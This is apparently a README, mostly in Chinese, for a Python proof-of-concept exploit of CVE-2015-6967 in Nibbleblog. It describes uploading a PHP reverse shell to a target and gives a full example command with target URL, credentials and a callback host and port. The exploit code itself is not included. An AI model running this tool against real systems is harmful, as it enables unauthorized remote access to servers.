
CVE-2015-6967 PoC Exploit
CVE-2015-6967 PoC 漏洞利用工具
该 Python 脚本利用 Nibbleblog 中的一个漏洞(CVE-2015-6967),向目标上传一个反向 Shell。脚本会接收用户输入的目标 URL、用户凭证以及你的主机 IP/端口,然后通过上传一个 PHP 反向 Shell 来触发漏洞。
本脚本仅用于教育目的。严禁将其用于非法活动。在测试或利用任何你不拥有或未获授权访问的系统上的漏洞之前,务必获得明确的许可。
requests 库argparse 库colorama 库pyfiglet 库你可以使用以下命令安装所需的依赖:
pip install requests colorama pyfiglet
脚本运行需要以下几个参数:
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100